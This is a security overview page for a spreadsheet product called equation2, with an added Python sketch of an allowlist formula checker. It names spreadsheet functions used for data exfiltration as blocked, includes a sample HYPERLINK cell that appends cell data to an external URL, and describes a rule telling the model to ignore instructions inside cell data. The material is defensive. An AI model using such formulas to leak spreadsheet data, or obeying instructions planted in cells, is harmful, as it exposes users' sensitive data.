Security at equation2.

Spreadsheets are where the most sensitive data lives. We treat them that way.

Authentication

  • JWT access tokens (15 min expiry) and refresh tokens (30 days, rotated on use)
  • bcrypt password hashing
  • Google OAuth2; Microsoft OAuth2 for enterprise
  • TOTP 2FA (Google Authenticator)
  • API keys hashed with bcrypt; shown once on creation

Formula safety

Whitelist-only formula execution. Excel-style data exfiltration patterns (HYPERLINK, WEBSERVICE, IMPORTDATA, IMPORTXML, IMPORTHTML, IMPORTFEED) are rejected.
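A sketch of how an allowlist check of this kind can work, added here as an illustration and not equation2's own code. The allowlist contents and the names `ALLOWED_FUNCTIONS`, `called_functions` and `check_formula` are assumptions; the check also normalizes the `_xlfn.` prefix that xlsx files put in front of newer functions and ignores function names that only appear inside string literals.

```python
import re

# Assumed allowlist for illustration; the product's real list is not given on this page.
ALLOWED_FUNCTIONS = frozenset({"SUM", "AVERAGE", "IF", "ROUND", "MIN", "MAX", "CONCAT", "LEN"})

# Excel string literals: double-quoted, with "" as the escaped quote.
_STRING_LITERAL = re.compile(r'"(?:[^"]|"")*"')
# A function call is an identifier (optionally dotted) followed by "(".
_CALL = re.compile(r'([A-Za-z_][A-Za-z0-9_.]*)\s*\(')


def called_functions(formula):
    """Return the normalized names of every function a formula calls, in order."""
    body = _STRING_LITERAL.sub('""', formula)  # quoted text is data, not code
    names = []
    for raw in _CALL.findall(body):
        name = raw.upper()  # function names are case-insensitive
        if name.startswith("_XLFN."):  # storage prefix xlsx uses for newer functions
            name = name[len("_XLFN."):]
        names.append(name)
    return names


def check_formula(cell):
    """Return (allowed, rejected_names). Plain cell text is not a formula and passes."""
    if not cell.startswith("="):
        return True, []
    # Default deny: anything not explicitly allowed is rejected, listed or not.
    rejected = [n for n in called_functions(cell) if n not in ALLOWED_FUNCTIONS]
    return not rejected, rejected


if __name__ == "__main__":
    # Constructed sample cells, not taken from any real workbook.
    for cell in ('=SUM(A1:A3)',
                 '=HYPERLINK("http://example.invalid/?d="&A1,"x")',
                 '=if(A1>0, _xlfn.WEBSERVICE(B1), 0)',
                 '=LEN("IMPORTDATA(A1)")'):
        print(cell, "->", check_formula(cell))
```

Because the check denies by default, the six functions named above need no blocklist entry of their own; they fail simply by not being on the list.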

AI prompt injection defense

Cell content is wrapped in hard data boundaries before reaching any model. Prompts instruct the model to treat cell content as untrusted data — instructions inside <data> tags are never followed.

File uploads

100MB cap, whitelisted MIME types, ClamAV virus scanning, and a hardened xlsx parser that strips VBA macros at parse time — they are never executed.

Encryption

TLS 1.3 in transit. AES-256 at rest on encrypted PostgreSQL volumes. Secrets live in environment variables — never in the codebase, never in the database.

Audit trail

Every action logged with user, IP, user agent, and before/after values. Queryable from CLI: eq2 audit --cell=A1.